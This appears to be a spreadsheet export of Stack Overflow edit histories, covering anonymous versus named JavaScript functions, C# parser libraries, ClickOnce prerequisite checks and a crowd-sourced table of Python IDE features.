 &lt;pre&gt;&lt;code&gt;function myEventHandler() {_x000D_
    // do something_x000D_
}_x000D_
_x000D_
for (var i = 0; i &amp;lt; 1000; ++i) {_x000D_
    myObjects[i].onMyEvent = myEventHandler;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If you were to create the anonymous function before entering the loop, then only assign references to it to the array elements while inside the loop, you will find that there is no performance or semantic difference whatsoever when compared to the named function version:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var handler = function() {_x000D_
    // do something    _x000D_
};_x000D_
for (var i = 0; i &amp;lt; 1000; ++i) {    _x000D_
    myObjects[i].onMyEvent = handler;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In short, there is no observable performance cost to using anonymous over named functions.&lt;/p&gt; _x000D_
 &lt;p&gt; As an aside, it may appear from above that there is no difference between:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;function myEventHandler() { /* ... */ }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var myEventHandler = function() { /* ... */ }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The former is a &lt;em&gt;function declaration&lt;/em&gt; whereas the latter is a variable assignment to an anonymous function. Although they may appear to have the same effect, JavaScript does treat them slightly differently. To understand the difference, I recommend reading, â€œ&lt;a href="http://www.dustindiaz.com/javascript-function-declaration-ambiguity/" rel="nofollow noreferrer"&gt;JavaScript function declaration ambiguity&lt;/a&gt;â€?.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>MisterJames</t>
  </si>
  <si>
    <t>Chandan Pasunoori</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Works on source code:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.inevitablesoftware.com/Products.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Inevitable Software C# Parser and CodeDOM&lt;/span&gt;&lt;/a&gt;:&lt;span class="diff-delete"&gt; Through&lt;/span&gt; C# &lt;span class="diff-delete"&gt;4&lt;/span&gt;.&lt;span class="diff-delete"&gt;0+&lt;/span&gt;, &lt;span class="diff-delete"&gt;commercial product ($99/$49)&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.csharpparser.com/csparser.php" rel="nofollow noreferrer"&gt;Metaspec C# Parser&lt;/a&gt;: From C# 1.0 to 3.0, commercial product (about 5000$)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.sharprecognize.com/" rel="nofollow noreferrer"&gt;#recognize!&lt;/a&gt;: From C# 1.0 to 3.0, commercial product (about 900â‚¬) (answer by &lt;a href="http://stackoverflow.com/questions/81406/parser-for-c#185380"&gt;SharpRecognize&lt;/a&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.icsharpcode.net/OpenSource/SD/" rel="nofollow noreferrer"&gt;SharpDevelop Parser&lt;/a&gt; (answer by &lt;a href="http://stackoverflow.com/questions/81406/parser-for-c#81434"&gt;Akselsson&lt;/a&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://wiki.sharpdevelop.net/NRefactory.ashx" rel="nofollow noreferrer"&gt;NRefactory&lt;/a&gt;: From C# 1.0 to 3.0, open-source, parser used in SharpDevelop&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.codeplex.com/csparser" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;CSParser&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;: From C# 1.0 to 2.0, open-source&lt;/span&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Works on assembly:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; System.Reflection&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://ccimetadata.codeplex.com/" rel="nofollow noreferrer"&gt;Microsoft Common Compiler Infrastructure&lt;/a&gt;: From C# 1.0 to 3.0, Microsoft Public License. Used by &lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=9aeaa970-f281-4fb0-aba1-d59d7ed09772&amp;amp;displaylang=en" rel="nofollow noreferrer"&gt;Fxcop&lt;/a&gt; and &lt;a href="http://research.microsoft.com/en-us/projects/specsharp/" rel="nofollow noreferrer"&gt;Spec#&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.mono-project.com/Cecil" rel="nofollow noreferrer"&gt;Mono.Cecil&lt;/a&gt;: From C# 1.0 to 3.0, open-source&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The problem with assembly "parsing" is that we have less informations about line and file (the informations is based on .pdb file, and Pdb contains lines informations only for methods)&lt;/p&gt; _x000D_
 &lt;p&gt; I personnaly recommend &lt;strong&gt;Mono.Cecil&lt;/strong&gt; and &lt;strong&gt;NRefactory&lt;/strong&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Works on source code:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.codeplex.com/csparser" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;CSParser&lt;/span&gt;&lt;/a&gt;:&lt;span class="diff-add"&gt; From&lt;/span&gt; C# &lt;span class="diff-add"&gt;1&lt;/span&gt;.&lt;span class="diff-add"&gt;0 to 2.0&lt;/span&gt;, &lt;span class="diff-add"&gt;open-source&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.csharpparser.com/csparser.php" rel="nofollow noreferrer"&gt;Metaspec C# Parser&lt;/a&gt;: From C# 1.0 to 3.0, commercial product (about 5000$)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.sharprecognize.com/" rel="nofollow noreferrer"&gt;#recognize!&lt;/a&gt;: From C# 1.0 to 3.0, commercial product (about 900â‚¬) (answer by &lt;a href="http://stackoverflow.com/questions/81406/parser-for-c#185380"&gt;SharpRecognize&lt;/a&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.icsharpcode.net/OpenSource/SD/" rel="nofollow noreferrer"&gt;SharpDevelop Parser&lt;/a&gt; (answer by &lt;a href="http://stackoverflow.com/questions/81406/parser-for-c#81434"&gt;Akselsson&lt;/a&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://wiki.sharpdevelop.net/NRefactory.ashx" rel="nofollow noreferrer"&gt;NRefactory&lt;/a&gt;: From C# 1.0 to 3.0, open-source, parser used in SharpDevelop&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Works on assembly:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; System.Reflection&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://ccimetadata.codeplex.com/" rel="nofollow noreferrer"&gt;Microsoft Common Compiler Infrastructure&lt;/a&gt;: From C# 1.0 to 3.0, Microsoft Public License. Used by &lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=9aeaa970-f281-4fb0-aba1-d59d7ed09772&amp;amp;displaylang=en" rel="nofollow noreferrer"&gt;Fxcop&lt;/a&gt; and &lt;a href="http://research.microsoft.com/en-us/projects/specsharp/" rel="nofollow noreferrer"&gt;Spec#&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.mono-project.com/Cecil" rel="nofollow noreferrer"&gt;Mono.Cecil&lt;/a&gt;: From C# 1.0 to 3.0, open-source&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The problem with assembly "parsing" is that we have less informations about line and file (the informations is based on .pdb file, and Pdb contains lines informations only for methods)&lt;/p&gt; _x000D_
 &lt;p&gt; I personnaly recommend &lt;strong&gt;Mono.Cecil&lt;/strong&gt; and &lt;strong&gt;NRefactory&lt;/strong&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>MartinStettner</t>
  </si>
  <si>
    <t>Ken Beckett</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If I understand correctly, ClickOnce only checks for prerequisites with the first install of an application through the setup.exe file that contains the prerequisite information. If the user opens the app in the future it will check for new versions, but it does not launch the setup.exe again, thus not checking for any NEW prerequisites that might have been added.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there any way to force ClickOnce to check the prerequisites again or does anyone have a good solution&lt;span class="diff-delete"&gt; (&lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Edit&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; -&lt;/span&gt; without asking the user to run the setup.exe again&lt;span class="diff-delete"&gt;)&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If I understand correctly, ClickOnce only checks for prerequisites with the first install of an application through the setup.exe file that contains the prerequisite information. If the user opens the app in the future it will check for new versions, but it does not launch the setup.exe again, thus not checking for any NEW prerequisites that might have been added.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there any way to force ClickOnce to check the prerequisites again or does anyone have a good solution without asking the user to run the setup.exe again?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Timo</t>
  </si>
  <si>
    <t>ljs</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As a Python newbie, it is interesting to know what IDE's ("GUIs/editors") others use for Python coding.&lt;/p&gt; _x000D_
 &lt;p&gt; If you can just give the name (e.g. Textpad, Eclipse ..) that will be enough. If it is already mentioned, you can just vote for it.&lt;/p&gt; _x000D_
 &lt;p&gt; But if you can also give some more comparative information, that will be much appreciated.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;h2&gt;&lt;strong&gt;Update&lt;/strong&gt;: Results so far&lt;/h2&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;a href="http://pydev.org/" rel="nofollow noreferrer"&gt;PyDev with Eclipse&lt;/a&gt; (CP, F, AC, PD, EM, SI, MLS, UML, SC, UT, LN, CF, BM)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.openkomodo.com/" rel="nofollow noreferrer"&gt;Komodo&lt;/a&gt; (CP, C/F, MLS, PD, AC, SC)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.emacswiki.org/cgi-bin/wiki" rel="nofollow noreferrer"&gt;Emacs&lt;/a&gt; (CP, F, AC, MLS, PD, EM, SC, SI, BM, LN, CF, CT, UT, UML)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.vim.org/" rel="nofollow noreferrer"&gt;Vim&lt;/a&gt; (CP, F, AC, MLS, SI, BM, LN, CF )&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://macromates.com" rel="nofollow noreferrer"&gt;TextMate&lt;/a&gt; (Mac, CT, CF, MLS, SI, BM, LN)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.gnome.org/projects/gedit/" rel="nofollow noreferrer"&gt;GEdit&lt;/a&gt; (Linux, AC)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.python.org/idle/doc/idle2.html" rel="nofollow noreferrer"&gt;Idle&lt;/a&gt; (CP, F, AC)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://pida.co.uk/" rel="nofollow noreferrer"&gt;PIDA&lt;/a&gt; (Linux, CP, F, AC, MLS, SI, BM, LN, CF)(VIM Based)&lt;/li&gt; _x000D_
  &lt;li&gt; [NotePad++] &lt;a href="http://notepad-plus.sourceforge.net/uk/site.htm" rel="nofollow noreferrer"&gt;9&lt;/a&gt; (Windows)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://bluefish.openoffice.nl/" rel="nofollow noreferrer"&gt;BlueFish&lt;/a&gt; (Linux)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.jedit.org/" rel="nofollow noreferrer"&gt;JEdit&lt;/a&gt; (CP, F, BM, LN, CF, MLS)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.e-texteditor.com" rel="nofollow noreferrer"&gt;E-Texteditor&lt;/a&gt; (TextMate Clone for Windows)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.wingware.com/" rel="nofollow noreferrer"&gt;WingIde&lt;/a&gt; (CP, C, AC, MLS (support for C), PD, EM, SC, SI, BM, LN, CF, CT, UT)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.die-offenbachs.de/eric/index.html" rel="nofollow noreferrer"&gt;Eric Ide&lt;/a&gt; (CP, F, AC, PD, EM, SI, LN, CF, UT)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://code.google.com/p/pyscripter/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Pyscripter&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; (&lt;/span&gt;&lt;a href="http://mmm-experts.com/Downloads.aspx?ProductId=4" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;old link&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;)&lt;/span&gt; (Windows, F, AC, PD, EM, SI, LN, CT, UT)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://context.cx/" rel="nofollow noreferrer"&gt;ConTEXT&lt;/a&gt; (Windows, C)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://pythonide.blogspot.com" rel="nofollow noreferrer"&gt;SPE&lt;/a&gt; (F, AC, UML)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.scintilla.org/SciTE.html" rel="nofollow noreferrer"&gt;SciTE&lt;/a&gt; (CP, F, MLS, EM, BM, LN, CF, CT, SH)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.zeusedit.com" rel="nofollow noreferrer"&gt;Zeus&lt;/a&gt; (W, C, BM, LN, CF, SI, SC, CT)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.netbeans.org/features/python/index.html" rel="nofollow noreferrer"&gt;NetBeans&lt;/a&gt; (CP, F, PD, UML, AC, MLS, SC, SI, BM, LN, CF, CT, UT, RAD)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://dabodev.com/" rel="nofollow noreferrer"&gt;DABO&lt;/a&gt; (CP)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.thekompany.com/products/blackadder" rel="nofollow noreferrer"&gt;Black Addr&lt;/a&gt; (C, CP, CF, SI)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://sourceforge.net/projects/pywin32/" rel="nofollow noreferrer"&gt;PythonWin&lt;/a&gt; (W)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.geany.org/" rel="nofollow noreferrer"&gt;Geany&lt;/a&gt; (CP, F, very limited AC, MLS, SI, BM, LN, CF)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://code.google.com/p/ulipad/" rel="nofollow noreferrer"&gt;UliPad&lt;/a&gt; (CP, F)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://boa-constructor.sourceforge.net/" rel="nofollow noreferrer"&gt;Boa Constructor&lt;/a&gt; (CP, F, AC, PD, EM, SI, BM, LN, UML, CF, CT)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.scriptdevelop.com" rel="nofollow noreferrer"&gt;ScriptDev&lt;/a&gt; (W, C, AC, MLS, PD, EM, SI, BM, LN, CF, CT)&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; Acronyms used:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; CP - Cross Platfom&lt;/li&gt; _x000D_
  &lt;li&gt; C - Commercial&lt;/li&gt; _x000D_
  &lt;li&gt; F - Free&lt;/li&gt; _x000D_
  &lt;li&gt; AC - Automatic Code-completion&lt;/li&gt; _x000D_
  &lt;li&gt; MLS - Multi-Language Support&lt;/li&gt; _x000D_
  &lt;li&gt; PD - Integrated Python Debugging&lt;/li&gt; _x000D_
  &lt;li&gt; EM - ErrorMarkup&lt;/li&gt; _x000D_
  &lt;li&gt; SC - Source Control integration&lt;/li&gt; _x000D_
  &lt;li&gt; SI - Smart Indent&lt;/li&gt; _x000D_
  &lt;li&gt; BM - Bracket Matching&lt;/li&gt; _x000D_
  &lt;li&gt; LN - Line Numbering&lt;/li&gt; _x000D_
  &lt;li&gt; UML - UML editing / viewing&lt;/li&gt; _x000D_
  &lt;li&gt; CF - Code Folding&lt;/li&gt; _x000D_
  &lt;li&gt; CT - Code Templates&lt;/li&gt; _x000D_
  &lt;li&gt; UT - Unit Testing&lt;/li&gt; _x000D_
  &lt;li&gt; UID - Gui Designer (e.g. QT, Eric, ..)&lt;/li&gt; _x000D_
  &lt;li&gt; DB - integrated database support&lt;/li&gt; _x000D_
  &lt;li&gt; RAD - Rapid app development support&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I don't mention basics like Syntax highlighting as I expect these by default.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; This is a just dry list reflecting your feedback and comments, I am not advocating any of these tools. I will keep updating this list as you keep posting your answers.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;PS. Can you help me to add features of the above editors to the list (like autocomplete, debugging, or etc)?&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As a Python newbie, it is interesting to know what IDE's ("GUIs/editors") others use for Python coding.&lt;/p&gt; _x000D_
 &lt;p&gt; If you can just give the name (e.g. Textpad, Eclipse ..) that will be enough. If it is already mentioned, you can just vote for it.&lt;/p&gt; _x000D_
 &lt;p&gt; But if you can also give some more comparative information, that will be much appreciated.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;h2&gt;&lt;strong&gt;Update&lt;/strong&gt;: Results so far&lt;/h2&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;a href="http://pydev.org/" rel="nofollow noreferrer"&gt;PyDev with Eclipse&lt;/a&gt; (CP, F, AC, PD, EM, SI, MLS, UML, SC, UT, LN, CF, BM)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.openkomodo.com/" rel="nofollow noreferrer"&gt;Komodo&lt;/a&gt; (CP, C/F, MLS, PD, AC, SC)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.emacswiki.org/cgi-bin/wiki" rel="nofollow noreferrer"&gt;Emacs&lt;/a&gt; (CP, F, AC, MLS, PD, EM, SC, SI, BM, LN, CF, CT, UT, UML)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.vim.org/" rel="nofollow noreferrer"&gt;Vim&lt;/a&gt; (CP, F, AC, MLS, SI, BM, LN, CF )&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://macromates.com" rel="nofollow noreferrer"&gt;TextMate&lt;/a&gt; (Mac, CT, CF, MLS, SI, BM, LN)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.gnome.org/projects/gedit/" rel="nofollow noreferrer"&gt;GEdit&lt;/a&gt; (Linux, AC)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.python.org/idle/doc/idle2.html" rel="nofollow noreferrer"&gt;Idle&lt;/a&gt; (CP, F, AC)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://pida.co.uk/" rel="nofollow noreferrer"&gt;PIDA&lt;/a&gt; (Linux, CP, F, AC, MLS, SI, BM, LN, CF)(VIM Based)&lt;/li&gt; _x000D_
  &lt;li&gt; [NotePad++] &lt;a href="http://notepad-plus.sourceforge.net/uk/site.htm" rel="nofollow noreferrer"&gt;9&lt;/a&gt; (Windows)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://bluefish.openoffice.nl/" rel="nofollow noreferrer"&gt;BlueFish&lt;/a&gt; (Linux)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.jedit.org/" rel="nofollow noreferrer"&gt;JEdit&lt;/a&gt; (CP, F, BM, LN, CF, MLS)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.e-texteditor.com" rel="nofollow noreferrer"&gt;E-Texteditor&lt;/a&gt; (TextMate Clone for Windows)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.wingware.com/" rel="nofollow noreferrer"&gt;WingIde&lt;/a&gt; (CP, C, AC, MLS (support for C), PD, EM, SC, SI, BM, LN, CF, CT, UT)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.die-offenbachs.de/eric/index.html" rel="nofollow noreferrer"&gt;Eric Ide&lt;/a&gt; (CP, F, AC, PD, EM, SI, LN, CF, UT)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://mmm-experts.com/Downloads.aspx?ProductId=4" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Pyscripter&lt;/span&gt;&lt;/a&gt; (Windows, F, AC, PD, EM, SI, LN, CT, UT)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://context.cx/" rel="nofollow noreferrer"&gt;ConTEXT&lt;/a&gt; (Windows, C)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://pythonide.blogspot.com" rel="nofollow noreferrer"&gt;SPE&lt;/a&gt; (F, AC, UML)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.scintilla.org/SciTE.html" rel="nofollow noreferrer"&gt;SciTE&lt;/a&gt; (CP, F, MLS, EM, BM, LN, CF, CT, SH)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.zeusedit.com" rel="nofollow noreferrer"&gt;Zeus&lt;/a&gt; (W, C, BM, LN, CF, SI, SC, CT)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.netbeans.org/features/python/index.html" rel="nofollow noreferrer"&gt;NetBeans&lt;/a&gt; (CP, F, PD, UML, AC, MLS, SC, SI, BM, LN, CF, CT, UT, RAD)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://dabodev.com/" rel="nofollow noreferrer"&gt;DABO&lt;/a&gt; (CP)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.thekompany.com/products/blackadder" rel="nofollow noreferrer"&gt;Black Addr&lt;/a&gt; (C, CP, CF, SI)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://sourceforge.net/projects/pywin32/" rel="nofollow noreferrer"&gt;PythonWin&lt;/a&gt; (W)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.geany.org/" rel="nofollow noreferrer"&gt;Geany&lt;/a&gt; (CP, F, very limited AC, MLS, SI, BM, LN, CF)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://code.google.com/p/ulipad/" rel="nofollow noreferrer"&gt;UliPad&lt;/a&gt; (CP, F)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://boa-constructor.sourceforge.net/" rel="nofollow noreferrer"&gt;Boa Constructor&lt;/a&gt; (CP, F, AC, PD, EM, SI, BM, LN, UML, CF, CT)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.scriptdevelop.com" rel="nofollow noreferrer"&gt;ScriptDev&lt;/a&gt; (W, C, AC, MLS, PD, EM, SI, BM, LN, CF, CT)&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; Acronyms used:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; CP - Cross Platfom&lt;/li&gt; _x000D_
  &lt;li&gt; C - Commercial&lt;/li&gt; _x000D_
  &lt;li&gt; F - Free&lt;/li&gt; _x000D_
  &lt;li&gt; AC - Automatic Code-completion&lt;/li&gt; _x000D_
  &lt;li&gt; MLS - Multi-Language Support&lt;/li&gt; _x000D_
  &lt;li&gt; PD - Integrated Python Debugging&lt;/li&gt; _x000D_
  &lt;li&gt; EM - ErrorMarkup&lt;/li&gt; _x000D_
  &lt;li&gt; SC - Source Control integration&lt;/li&gt; _x000D_
  &lt;li&gt; SI - Smart Indent&lt;/li&gt; _x000D_
  &lt;li&gt; BM - Bracket Matching&lt;/li&gt; _x000D_
  &lt;li&gt; LN - Line Numbering&lt;/li&gt; _x000D_
  &lt;li&gt; UML - UML editing / viewing&lt;/li&gt; _x000D_
  &lt;li&gt; CF - Code Folding&lt;/li&gt; _x000D_
  &lt;li&gt; CT - Code Templates&lt;/li&gt; _x000D_
  &lt;li&gt; UT - Unit Testing&lt;/li&gt; _x000D_
  &lt;li&gt; UID - Gui Designer (e.g. QT, Eric, ..)&lt;/li&gt; _x000D_
  &lt;li&gt; DB - integrated database support&lt;/li&gt; _x000D_
  &lt;li&gt; RAD - Rapid app development support&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I don't mention basics like Syntax highlighting as I expect these by default.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; This is a just dry list reflecting your feedback and comments, I am not advocating any of these tools. I will keep updating this list as you keep posting your answers.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;PS. Can you help me to add features of the above editors to the list (like autocomplete, debugging, or etc)?&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>husayt</t>
  </si>
  <si>
    <t>RedGlyph</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;Results&lt;/h2&gt; _x000D_
 &lt;pre&gt;                                       Rapid Application Development -._x000D_
                                           Integrated DB Support -+   |_x000D_
                                                GUI Designer  -+  |   |_x000D_
                                             Unit Testing -+   |  |   |_x000D_
                                        Code Templates -.  |   |  |   |_x000D_
                                       Code Folding -+  |  |   |  |   |_x000D_
                           UML Editing / Viewing -+  |  |  |   |  |   |_x000D_
                              Line Numbering -+   |  |  |  |   |  |   |_x000D_
                         Bracket Matching -+  |   |  |  |  |   |  |   |_x000D_
                          Smart Indent -+  |  |   |  |  |  |   |  |   |_x000D_
         Source Control Integration -+  |  |  |   |  |  |  |   |  |   |_x000D_
                   Error Markup  -+  |  |  |  |   |  |  |  |   |  |   |_x000D_
  Integrated Python Debugging -+  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
    Multi-Language Support -+  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
  Auto Code Completion -+   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 Commercial / Free --+  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 Cross Platform -+   |  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
                _|___|__|___|__|__|__|__|__|__|___|__|__|__|___|__|___|__x000D_
                |CP|C/F|AC|MLS|PD|EM|SC|SI|BM|LN|UML|CF|CT|UT|UID|DB|RAD|comments_x000D_
                +--+---+--+---+--+--+--+--+--+--+---+--+--+--+---+--+---+_x000D_
 BlackAdder     |Y | C |  |   |  |  |  |Y |  |  |   |Y |  |  |   |  |   |_x000D_
 BlueFish       |L |   |  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 ConTEXT        |W | C |  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 DABO           |Y |   |  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 DreamPie       |  | F |Y |   |  |  |  |Y |  |  |   |  |  |  |   |  |   |_x000D_
 Dr.Python      |  | F |  |   |  |Y |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 Editra         |Y | F |Y | Y |  |  |Y |Y |Y |Y |   |Y |  |  |   |  |   |_x000D_
 Emacs          |Y | F |Y | Y |Y |Y |Y |Y |Y |Y | Y |Y |Y |Y |   |  |   |_x000D_
 Eric Ide       |Y | F |Y |   |Y |Y |  |Y |  |Y |   |Y |  |Y |   |  |   |_x000D_
 E-Texteditor   |W |   |  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 Geany          |Y | F |Y*| Y |  |  |  |Y |Y |Y |   |Y |  |  |   |  |   |*very limited_x000D_
 Gedit          |Y | F |YÂ¹| Y |  |  |  |Y |Y |Y |   |  |YÂ²|  |   |  |   |Â¹ with plugin Â² sort of_x000D_
 Idle           |Y | F |Y |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 JEdit          |Y | F |  | Y |  |  |  |  |Y |Y |   |Y |  |  |   |  |   |_x000D_
